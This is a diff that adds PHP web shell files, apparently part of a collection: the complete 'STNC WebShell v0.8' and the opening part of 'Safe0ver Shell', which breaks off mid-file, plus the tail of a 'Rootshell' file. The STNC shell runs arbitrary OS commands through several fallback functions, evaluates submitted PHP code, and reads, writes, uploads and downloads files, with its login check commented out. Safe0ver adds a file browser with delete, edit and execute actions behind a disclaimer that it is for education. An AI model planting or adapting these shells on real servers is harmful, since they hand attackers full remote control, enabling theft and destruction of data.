+      <td width="100%" bgcolor="#FCFEBA" height="20">
+      <p align="center"><font face="Verdana" size="2">Rootshell v<?php echo "$version" ?>  2006 by <a style="text-decoration: none" target="_blank" href="http://www.SR-Crew.de.tt">SR-Crew</a> </font></td>
+    </tr>
+  </table>
+  </center>
+</div> 
\ No newline at end of file
diff --git a/php/STNC WebShell v0.8.php b/php/STNC WebShell v0.8.php
new file mode 100644
index 0000000..d622c70
--- /dev/null
+++ b/php/STNC WebShell v0.8.php	
@@ -0,0 +1,168 @@
+<?php
+$version = "0.8";
+$vsplit = "style=\"border-right: #000000 1px solid;\"";
+$hsplit = "style=\"border-bottom: #000000 1px solid;\"";
+error_reporting(0);
+
+if(version_compare(phpversion(),"4.1.0") == -1)
+{ $_POST=&$HTTP_POST_VARS; }
+if(get_magic_quotes_gpc())
+foreach ($_POST as $k=>$v)
+{ $_POST[$k] = stripslashes($v); }
+
+/*
+$login='root';
+$hash='b1b3773a05c0ed0176787a4f1574ff0075f7521e'; // sha1("qwerty")
+
+if(!(($_SERVER["PHP_AUTH_USER"]===$login)&&(sha1($_SERVER["PHP_AUTH_PW"])===$hash)))
+{
+header("HTTP/1.0 401 Unauthorized");
+header("WWW-Authenticate: Basic");
+die();
+}
+*/
+
+function fe($s)
+{return function_exists($s);}
+function cmd($s)
+{if(fe("exec")){exec($s,$r);$r=join("\n",$r);}
+elseif(fe("shell_exec"))$r=shell_exec($s);
+elseif(fe("system")){ob_start();system($s);$r=ob_get_contents();ob_end_clean();}
+elseif(fe("passthru")){ob_start();passthru($s);$r=ob_get_contents();ob_end_clean();}
+elseif(is_resource($f=popen($s,"r"))){$r="";while(!feof($f))$r.=fread($f,512);pclose($f);}
+else $r=`$s`;return $r;}
+function safe_mode_is_on()
+{return ini_get('safe_mode');}
+function str100($s)
+{if(strlen($s)>100) $s=substr($s,0,100)."..."; return $s;}
+function id()
+{return str100(cmd("id"));}
+function uname()
+{return str100(cmd("uname -a"));}
+
+function edit($size, $name, $val)
+{ return "<input type=text size=$size name=$name value=\"$val\">"; }
+function button($capt)
+{ return "<input class=\"btn\" type=submit value=\"$capt\">"; }
+function hidden($name, $val)
+{ return "<input type=hidden name=$name value=\"$val\">"; }
+function hidden_pwd()
+{ global $location; return hidden("pwd",$location);}
+
+$action_edit = false;
+
+$printline = "";
+
+if(isset($_POST["action"])) $action = $_POST["action"];
+else $action = "cmd";
+
+if(isset($_POST["pwd"]))
+{ $pwd = $_POST["pwd"]; $type = filetype($pwd); if($type === "dir")chdir($pwd); else $printline = "\"$pwd\" - no such directory."; }
+
+$location = getcwd();
+
+if(($action === "download")&&(isset($_POST["fname"])))
+{
+  $fname = $_POST["fname"];
+  if(file_exists($fname))
+  {
+    $pathinfo = pathinfo($fname);
+    header("Content-Transfer-Encoding: binary");
+    header("Content-type: application/x-download");
+    header("Content-Length: ".filesize($fname));
+    header("Content-Disposition: attachment; filename=".$pathinfo["basename"]);
+    readfile($fname);
+    die();
+  }
+  else
+    $printline = "\"$fname\" - download failed.";
+}
+
+echo "<head><style>input {border: black 1px solid; background-color: #dfdfdf; font: 8pt verdana;}
+textarea {background-color:#dfdfdf; scrollbar-face-color: #dfdfdf; scrollbar-highlight-color: #dfdfdf;
+scrollbar-shadow-color: #dfdfdf; scrollbar-3dlight-color: #dfdfdf; scrollbar-arrow-color: #dfdfdf; scrollbar-track-color: #dfdfdf;
+scrollbar-darkshadow-color: #dfdfdf; border: black 1px solid; font: fixedsys bold; }
+td {padding:0;} body {margin: 0; padding: 0; background-color: #cfcfcf;} a {color:black;text-decoration:none;}
+.btn {background-color: #cfcfcf;} .pad {padding:5;}
+</style><title>  STNC WebShell v$version  </title></head><body><table width=100%>
+<tr><td $hsplit><table><tr><td $vsplit><b>&nbsp;&nbsp;STNC&nbsp;WebShell&nbsp;v$version&nbsp;&nbsp;</b></td><td>id: ".id()."<br>uname: ".uname()."<br>your ip: ".$_SERVER["REMOTE_ADDR"]." - server ip: ".gethostbyname($_SERVER["HTTP_HOST"])." - safe_mode: ".((safe_mode_is_on()) ? "on" : "off")."</td></tr></table></tr></td>
+<tr><form method=post><td class=\"pad\" colspan=2 $hsplit><center>".hidden("action","save").hidden_pwd()."<textarea cols=120 rows=16 wrap=off name=data>";
+
+echo htmlspecialchars($printline)."\n";
+
+if($action === "cmd")
+{
+  if(isset($_POST["cmd"]))
+    $cmd = $_POST["cmd"];
+  else
+    $cmd = "ls -la";
+
+  $result = htmlspecialchars(cmd($cmd));
+
+  if($result === "")
+    $result = cmd("ls -la");
+
+  echo $result;
+  $location = getcwd();
+}
+elseif(($action === "edit")&&(isset($_POST["fname"])))
+{
+  $fname = $_POST["fname"];
+  ob_start();
+
+  if(!readfile($fname))
+    echo "Cann't open file \"$fname\".";
+  else
+    $action_edit = true;
+
+  $result = ob_get_clean();
+  ob_end_clean();
+  echo htmlspecialchars($result);
+}
+elseif(($action === "save")&&(isset($_POST["fname"]))&&(isset($_POST["data"])))
+{
+  $fname = $_POST["fname"];
+  $data = $_POST["data"];
+  $fid = fopen($fname, "w");
+  $fname = htmlspecialchars($fname);
+
+  if(!$fid)
+    echo "Cann't save file \"$fname\".";
+  else
+  {
+    fputs($fid, $data);
+    fclose($fid);
+    echo "File \"$fname\" is saved.";
+  }
+}
+elseif(($action === "upload")&&(isset($_FILES["file"]))&&(isset($_POST["fname"])))
+{
+  $fname = $_POST["fname"];
+  if(copy($_FILES["file"]["tmp_name"], $fname))
+    echo "File \"$fname\" is uploaded.\nFile size: ".filesize($fname)." bytes.";      
+  else
+    echo "Upload failed!";
+}
+elseif(($action === "eval")&&(isset($_POST["code"])))
+{
+  $code = $_POST["code"];
+  ob_start();
+  eval($code);
+  $result = ob_get_clean();
+  ob_end_clean();
+  echo htmlspecialchars($result);
+}
+
+echo "</textarea>".(($action_edit) ? "<br>".button("  Save  ").hidden("fname",$fname):"")."</center></td></form></tr>
+<tr><form method=post><td class=\"pad\" $hsplit><center>".hidden("action","cmd")."<table><tr><td width=80>Command:&nbsp;</td><td>".edit(85,"cmd","")."</td></tr><tr><td>Location:&nbsp;</td><td>".edit(85,"pwd",$location)."&nbsp;".button("Execute")."</td></tr></table></center></td></form></tr>
+<tr><form method=post><td class=\"pad\" $hsplit><center>".hidden("action","edit").hidden_pwd()."<table><tr><td width=80>Edit file:</td><td>".edit(85,"fname",$location)."</td><td>".button("    Edit    ")."</td></table></center></td></form></tr>
+
+<tr><form method=post><td class=\"pad\" $hsplit><table width=100%><tr><td width=50% $vsplit>".
+  hidden("action","download").hidden_pwd()."<center><table><tr><td width=80>File:</td><td>".edit(50,"fname",$location)."</td><td>".button("Download")."</td></tr></table></center>
+</td></form><form method=post enctype=multipart/form-data><td class=\"pad\" width=50%>".
+  hidden("action","upload").hidden_pwd()."<center><table><tr><td width=80>File:</td><td><input type=file size=50 name=file></td></tr><tr><td>To file:</td><td>".edit(50,"fname",$location)."&nbsp;".button("Upload")."</td></tr></table></center>
+</td></tr></table></td></form></tr>
+
+<tr><form method=post><td class=\"pad\" $hsplit>".hidden("action","eval").hidden_pwd()."<center><textarea cols=100 rows=4 wrap=off name=code></textarea><br>".button("   Eval   ")."</center></td></form></tr>
+<tr><td align=right>Coded by drmist | <a href=\"http://drmist.ru\">http://drmist.ru</a> | <a href=\"http://www.security-teams.net\">http://www.security-teams.net</a> | <a href=\"http://www.security-teams.net/index.php?showtopic=3429\">not enough functions?</a> | (c) 2006 [STNC]</td></tr></table></body>";
+?>
\ No newline at end of file
diff --git a/php/Safe0ver Shell -Safe Mod Bypass By Evilc0der.php b/php/Safe0ver Shell -Safe Mod Bypass By Evilc0der.php
new file mode 100644
index 0000000..34d7f7c
--- /dev/null
+++ b/php/Safe0ver Shell -Safe Mod Bypass By Evilc0der.php	
@@ -0,0 +1,950 @@
+<?php 
+
+
+/*
+*****************************************************************************************
+*                           Safe0ver Shell //Safe Mod Bypass By Evilc0der                *
+***************************************************************************************** 
+*        Evilc0der.org is a Platform Which You can Publish Your Shell Script             *  
+
+***************************************************************************************** 
+
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
+!!   Dikkat ! Script Egitim Amacli Yazilmistir.Scripti Kullanarak Yapacaginiz Illegal eylemlerden sorumlu Degiliz. 
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
+*/ 
+
+
+/*Setting some envirionment variables...*/ 
+
+/* I added this to ensure the script will run correctly...
+   Please enter the Script's filename in this variable. */   
+$SFileName=$PHP_SELF;
+
+/* uncomment the two following variables if you want to use http
+   authentication. This will password protect your PHPShell */
+//$http_auth_user = "phpshell";    /* HTTP Authorisation username, uncomment if you want to use this */
+//$http_auth_pass = "phpshell";    /* HTTP Authorisation password, uncomment if you want to use this */        
+
+error_reporting(0);
+$PHPVer=phpversion();
+$isGoodver=(intval($PHPVer[0])>=4);
+$scriptTitle = "Safe0ver";
+$scriptident = "$scriptTitle By Evilc0der.org";
+
+$urlAdd = "";
+$formAdd = "";
+
+function walkArray($array){
+  while (list($key, $data) = each($array))
+    if (is_array($data)) { walkArray($data); }
+    else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";}
+}
+
+if (isset($_PUT)) walkArray($_PUT);
+if (isset($_GET)) walkArray($_GET);
+if (isset($_POST)) walkArray($_POST);
+
+
+$pos = strpos($urlAdd, "s=r");
+if (strval($pos) != "") {
+$urlAdd= substr($urlAdd, 0, $pos);
+}
+
+$urlAdd .= "&s=r&";
+
+if (empty($Pmax))
+    $Pmax = 125;   /* Identifies the max amount of Directories and files listed on one page */
+if (empty($Pidx)) 
+    $Pidx = 0;
+
+$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
+$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
+
+$scriptdate = "7 Subat 2007";
+$scriptver = "Bet@ Versiyon";
+$LOCAL_IMAGE_DIR = "img";
+$REMOTE_IMAGE_URL = "img";
+$img = array(
+                "Edit"         => "edit.gif",
+                "Download"     => "download.gif",
+                "Upload"     => "upload.gif",
+                "Delete"     => "delete.gif",
+                "View"         => "view.gif",
+                "Rename"     => "rename.gif",
+                "Move"         => "move.gif",
+                "Copy"         => "copy.gif",
+                "Execute"     => "exec.gif"
+            );
+
+while (list($id, $im)=each($img))
+    if (file_exists("$LOCAL_IMAGE_DIR/$im"))
+        $img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
+    else
+         $img[$id] = "[$id]";
+
+
+
+
+/* HTTP AUTHENTICATION */
+
+    if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass)  ||  (($logoff==1) && $noauth=="yes")  )   { 
+        setcookie("noauth","");
+        Header( "WWW-authenticate:  Basic realm=\"$scriptTitle $scriptver\"");
+        Header( "HTTP/1.0  401  Unauthorized");
+        echo "Your username or password is incorrect";
+        exit ;
+                 
+    } 
+
+function buildUrl($display, $url) {
+        global $urlAdd;
+        $url = $SFileName . "?$urlAdd$url";
+    return "<a href=\"$url\">$display</a>";
+}
+
+function sp($mp) {
+    for ( $i = 0; $i < $mp; $i++ )
+        $ret .= "&nbsp;";
+    return $ret;
+}
+
+function spacetonbsp($instr) { return str_replace(" ", "&nbsp;", $instr);  } 
+
+function Mydeldir($Fdir) {
+    if (is_dir($Fdir)) {
+        $Fh=@opendir($Fdir);
+         while ($Fbuf = readdir($Fh))
+             if (($Fbuf != ".") && ($Fbuf != ".."))
+                Mydeldir("$Fdir/$Fbuf");
+        @closedir($Fh);
+                return rmdir($Fdir);
+    }    else {
+        return unlink($Fdir);
+    }
+}
+
+
+function arrval ($array) {
+list($key, $data) = $array;
+return $data;
+}
+
+function formatsize($insize) {  
+    $size = $insize;
+    $add = "B";
+    if ($size > 1024) {
+         $size = intval(intval($size) / 1.024)/1000;
+         $add = "KB";
+     }
+     if ($size > 1024) {
+         $size = intval(intval($size) / 1.024)/1000;
+         $add = "MB";
+     }
+     if ($size > 1024) {
+         $size = intval(intval($size) / 1.024)/1000;
+         $add = "GB";
+     }
+     if ($size > 1024) {
+         $size = intval(intval($size) / 1.024)/1000;
+         $add = "TB";
+     }
+     return "$size $add";
+}
+
+if ($cmd != "downl") {
+    ?>
+
+<!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?>  -->
+<HTML>
+ <HEAD>
+  <STYLE>
+  <!--
+    A{ text-decoration:none; color:navy; font-size: 12px }
+    body {
+	font-size: 12px;
+	font-family: arial, helvetica;
+	scrollbar-width: 5;
+	scrollbar-height: 5;
+	scrollbar-face-color: white;
+	scrollbar-shadow-color: silver;
+	scrollbar-highlight-color: white;
+	scrollbar-3dlight-color:silver;
+	scrollbar-darkshadow-color: silver;
+	scrollbar-track-color: white;
+	scrollbar-arrow-color: black;
+	background-color: #CCCCCC;
+    }
+    Table { font-size: 12px; }
+    TR{ font-size: 12px; }
+    TD{
+	font-size: 12px;
+	font-family: arial, helvetical;
+	BORDER-LEFT: black 0px solid;
+	BORDER-RIGHT: black 0px solid;
+	BORDER-TOP: black 0px solid;
+	BORDER-BOTTOM: black 0px solid;
+	COLOR: black;
+	background: #CCCCCC;
+    }
+    .border{       BORDER-LEFT: black 1px solid;
+            BORDER-RIGHT: black 1px solid;
+            BORDER-TOP: black 1px solid;
+            BORDER-BOTTOM: black 1px solid;
+          }
+    .none  {       BORDER-LEFT: black 0px solid;
+            BORDER-RIGHT: black 0px solid;
+            BORDER-TOP: black 0px solid;
+            BORDER-BOTTOM: black 0px solid;
+          }
+    .inputtext {
+            background-color: #EFEFEF;
+            font-family: arial, helvetica;
+            border: 1px solid #000000;
+            height: 20;
+    }
+    .lighttd {       background: #F8F8F8;
+    }
+    .darktd {        background: #CCCCCC;
+    }
+    input { font-family: arial, helvetica;
+    }
+    .inputbutton {
+                        background-color: #CCCCCC;
+            border: 1px solid #000000;
+            border-width: 1px;
+            height: 20;
+    }
+    .inputtextarea {
+            background-color: #CCCCCC;
+            border: 1px solid #000000;
+            scrollbar-width: 5;
+            scrollbar-height: 5;
+            scrollbar-face-color: #EFEFEF;
+            scrollbar-shadow-color: silver;
+            scrollbar-highlight-color: #EFEFEF;
+            scrollbar-3dlight-color:silver;
+            scrollbar-darkshadow-color: silver;
+            scrollbar-track-color: #EFEFEF;
+            scrollbar-arrow-color: black;
+    }
+    .top { BORDER-TOP: black 1px solid; }
+    .textin { BORDER-LEFT: silver 1px solid;
+              BORDER-RIGHT: silver 1px solid;
+           BORDER-TOP: silver 1px solid;
+              BORDER-BOTTOM: silver 1px solid;
+              width: 99%; font-size: 12px; font-weight: bold; color: Black;
+            }
+    .notop { BORDER-TOP: black 0px solid; }
+    .bottom { BORDER-BOTTOM: black 1px solid; }
+    .nobottom { BORDER-BOTTOM: black 0px solid; }
+    .left { BORDER-LEFT: black 1px solid; }
+    .noleft { BORDER-LEFT: black 0px solid; }
+    .right { BORDER-RIGHT: black 1px solid; }
+    .noright { BORDER-RIGHT: black 0px solid; }
+    .silver{ BACKGROUND: #CCCCCC; }
+body,td,th {
+	color: #660000;
+}
+a:link {
+	color: #000000;
+	text-decoration: none;
+}
+a:hover {
+	color: #00FF00;
+	text-decoration: none;
+}
+a:active {
+	color: #666666;
+	text-decoration: none;
+}
+a:visited {
+	text-decoration: none;
+}
+.style5 {
+	color: #660000;
+	font-weight: bold;
+}
+  -->
+  </STYLE>
+  <TITLE><?php echo $SFileName ?></TITLE>
+ <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></HEAD>
+ <body topmargin="0" leftmargin="0">
+ <div style="position: absolute; background: #CCCCCC; z-order:10000; top:0; left:0; width: 100%; height: 100%;">
+ <table nowrap width=100% border="0" cellpadding="0" cellspacing="0">
+   <tr>
+     <td width="100%" class="silver border"><center>
+         <strong> <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font> </strong>
+     </center></td>
+   </tr>
+ </table>
+ <table width=100% height="100%" NOWRAP border="0">
+  <tr NOWRAP>
+   <td width="100%" NOWRAP><br>
+
+    <?php
+}
+
+if ( $cmd=="dir" ) {
+      $h=@opendir($dir);
+     if ($h == false) {
+          echo "<br><font color=\"red\">".sp(3)."\n\n\n\n
+                Klasör Listelenemiyor!Lütfen Bypass Bölümünü Deneyin.<br>".sp(3)."\n
+                Script Gecisi Tamamlayamadi!
+                <br><br>".sp(3)."\n
+                Klasöre Girmek Icin yetkiniz Olduguna emin Olunuz...
+                <br><br></font>\n\n\n\n";
+     }
+        if (function_exists('realpath')) {
+        $partdir = realpath($dir);
+    }
+        else {
+        $partdir = $dir;
+    }
+     if (strlen($partdir) >= 100) {
+         $partdir = substr($partdir, -100);
+         $pos = strpos($partdir, "/");
+         if (strval($pos) != "") {
+             $partdir = "<--   ...".substr($partdir, $pos);
+         }
+        $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
+        $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); 
+    $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
+     }
+    ?>
+      <form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir">
+         <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0">
+      <tr>
+       <td width="100%" class="silver border">
+        <center>&nbsp;Safe0ver-Server File Browser...&nbsp;</center>
+       </td>
+      </tr>
+     </table>
+       <br>
+     <table width="100%" border="0" cellpadding="0" cellspacing="0">
+      <tr>
+           <td class="border nobottom noright">
+            &nbsp;Listeliyor:&nbsp;
+      </td>
+          <td width="100%" class="border nobottom noleft">
+           <table width="100%" border="0" cellpadding="1" cellspacing="0">
+             <tr>
+              <td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td>
+              <td NOWRAP><center>&nbsp;<a href="javascript: urlform.submit();"><b>GiT<b></a>&nbsp;<center></td>
+             </tr>
+            </table>
+            
+      </td>
+     </tr>
+    </table>
+  <!--    </form>   -->
+        <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" >
+         <tr>
+      <td width="100%" NOWRAP class="silver border">
+       &nbsp;Dosya Adi&nbsp;
+      </td>
+          <td NOWRAP class="silver border noleft">
+       &nbsp;Yapilabilecekler&nbsp;&nbsp;
+      </td>
+          <td NOWRAP class="silver border noleft">
+       &nbsp;Boyut&nbsp;
+      </td>
+          <td width=1 NOWRAP class="silver border noleft">
+       &nbsp;Yetkiler&nbsp;
+      </td>
+          <td NOWRAP class="silver border noleft">
+       &nbsp;Son Düzenleme&nbsp;
+      </td>
+     <tr>
+    <?php
+
+
+          /* <!-- This whole heap of junk is the sorting section... */
+
+     $dirn     = array();
+     $filen     = array();
+     $filesizes    = 0;
+     while ($buf = readdir($h)) {
+        if (is_dir("$dir/$buf"))
+            $dirn[] = $buf;
+            else 
+             $filen[] = $buf;
+        }         
+        $dirno     = count($dirn) + 1;
+         $fileno    = count($filen) + 1;
+
+          function mycmp($a, $b){
+            if ($a == $b) return 0;
+            return (strtolower($a) < strtolower($b)) ? -1 : 1;
+        }
+
+        if (function_exists("usort")) {
+            usort($dirn, "mycmp");
+            usort($filen, "mycmp");
+        }
+        else {
+            sort ($dirn);
+             sort ($filen);
+         }
+    reset ($dirn);
+     reset ($filen);
+     if (function_exists('array_merge')) {
+        $filelist = array_merge ($dirn, $filen);
+    }
+     else {
+        $filelist = $dirn + $filen;
+    }
+
+    
+    if ( count($filelist)-1 > $Pmax ) {
+        $from = $Pidx * $Pmax;
+        $to = ($Pidx + 1) * $Pmax-1;
+        if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 )
+            $to = count($filelist) - 1;
+        if ($to > count($filelist)-1)
+            $to = count($filelist)-1;
+        $Dcontents = array();
+        For ($Fi = $from; $Fi <= $to; $Fi++) {
+            $Dcontents[] = $filelist[$Fi];    
+        }
+
+    }
+    else {
+        $Dcontents = $filelist;
+    }
+    
+     $tdcolors = array("lighttd", "darktd");
+
+     while (list ($key, $file) = each ($Dcontents)) {
+          if (!$tdcolor=arrval(each($tdcolors))) {
+        reset($tdcolors);
+        $tdcolor = arrval(each($tdcolors));      }
+                   
+         if (is_dir("$dir/$file")) { /* <!-- If it's a Directory --> */
+                      /* <!-- Dirname --> */
+            echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."</td>\n";
+                  /* <!-- Actions --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n";
+                 /* <!-- Rename --> */
+            if ( ($file != ".") && ($file != "..") )
+                echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
+                 /* <!-- Delete --> */
+            if ( ($file != ".") && ($file != "..") )
+                echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
+                /* <!-- End of Actions --> */
+            echo "&nbsp;&nbsp;</center></td>\n";
+                  /* <!-- Size --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;</td>\n";
+                 /* <!-- Attributes --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
+             echo "<strong>D</strong>";
+                if ( @is_readable("$dir/$file") ) {
+                   echo "<strong>R</strong>";
+             }
+             if (function_exists('is_writeable')) {
+                if ( @is_writeable("$dir/$file") ) {
+                     echo "<strong>W</stong>";
+                 }
+            }
+             else {
+                    echo "<strong>(W)</stong>";
+              }
+              if ( @is_executable("$dir/$file") ) {
+                 echo "<Strong>X<strong>";
+             }
+             echo "&nbsp;&nbsp;</td>\n";
+                 /* <!-- Date --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
+             echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
+             echo "</td>";
+            echo "</tr>\n";
+
+            }
+          else { /* <!-- Then it must be a File... --> */
+                     /* <!-- Filename --> */
+            if ( @is_readable("$dir/$file") )
+                 echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."</td>\n";
+              else
+                  echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n";
+                                 /* <!-- Actions --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\"><center>&nbsp;&nbsp;\n";
+                 /* <!-- Rename --> */
+            echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
+                  /* <!-- Edit --> */
+            if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
+                 echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n";
+                   /* <!-- Copy --> */
+             echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n";
+                  /* <!-- Move --> */
+            if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
+                     echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n";
+                    /* <!-- Delete --> */
+            echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
+                 /* <!-- Download --> */
+            echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n";
+                 /* <!-- Execute --> */
+            if ( @is_executable("$dir/$file") )
+                 echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n";
+                    /* <!-- End of Actions --> */
+            echo sp(2)."</center></td>\n";
+                 /* <!-- Size --> */
+            echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n";
+             $size = @filesize("$dir/$file");
+             If ($size != false) {
+                    $filesizes += $size;
+                echo "&nbsp;&nbsp;<strong>".formatsize($size)."<strong>";
+            }
+            else
+                echo "&nbsp;&nbsp;<strong>0 B<strong>";
+             echo "&nbsp;&nbsp;</td>\n";
+
+                 /* <!-- Attributes --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
+
+             if ( @is_readable("$dir/$file") )
+                 echo "<strong>R</strong>";
+               if ( @is_writeable("$dir/$file") )
+                 echo "<strong>W</stong>";
+               if ( @is_executable("$dir/$file") )
+                 echo "<Strong>X<strong>";
+               if (function_exists('is_uploaded_file')){
+                 if ( @is_uploaded_file("$dir/$file") )
+                     echo "<Strong>U<strong>";
+             }
+             else {
+                echo "<Strong>(U)<strong>";
+            }
+             echo "&nbsp;&nbsp;</td>\n";
+                 /* <!-- Date --> */
+            echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
+             echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
+             echo "</td>";
+             echo "</tr>\n";
+         }
+      }
+
+        echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
+      echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Klasör,&nbsp;".@count ($filen)."&nbsp;Dosya&nbsp;&nbsp;\n";
+      echo "</td><td NOWRAP class=\"silver border noleft\">\n";
+      echo "&nbsp;&nbsp;Toplam Dosya Boyutu:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n";
+    
+    function printpagelink($a, $b, $link = ""){
+        if ($link != "") 
+            echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>";
+        else
+            echo "<b>| $a - $b |</b>";
+    }
+        
+    if ( count($filelist)-1 > $Pmax ) {
+        echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>";
+        $Fi = 0;
+        while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) {
+            $from = $Fi*$Pmax;
+            while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; 
+            $to = ($Fi + 1) * $Pmax - 1;
+            if ($Fi == $Pidx)
+                $link="";
+            else 
+                $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
+            printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
+            echo "&nbsp;&nbsp;&nbsp;";
+            $Fi++;
+        }
+        $from = $Fi*$Pmax;
+        while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; 
+        $to = count($filelist)-1;
+        if ($Fi == $Pidx)
+            $link="";
+        else 
+            $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
+        printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);        
+        
+    
+        echo "</center></td></tr></table></td></tr>";
+    }
+
+
+        echo "</table>\n<br><table NOWRAP>";
+
+      if ($isGoodver) {
+        echo "<tr><td class=\"silver border\">&nbsp;<strong>PHP Versiyonu:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer&nbsp;</td></tr>\n";
+    }
+     else {
+        echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer (Some functions might be unavailable...)&nbsp;</td></tr>\n";
+    }
+              /* <!-- Other Actions --> */
+       echo "<tr><td class=\"silver border\">&nbsp;<strong>Diger Islemler:&nbsp;&nbsp;</strong>&nbsp;</td>\n";
+      echo "<td>&nbsp;<b>".buildUrl( "| Yeni Dosya |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3).
+                         buildUrl( "| Yeni Klasör |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3).
+                 buildUrl( "| Dosya Yükle |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n";
+        echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n";
+      echo "<tr><td class=\"silver border\">&nbsp;<strong>IP Adresin:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n";
+      echo "<tr><td class=\"silver border\">&nbsp;<strong>Bulundugun Klasör:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n";
+      echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Semboller:&nbsp;&nbsp;</strong&nbsp;</td><td>\n";
+      echo "<table NOWRAP>";
+        echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Klasör.</td></tr>\n";
+       echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Okunabilir.</td></tr>\n";
+      echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Yazilabilir.</td></tr>\n";
+      echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Komut Calistirilabilir.</td></tr>\n";
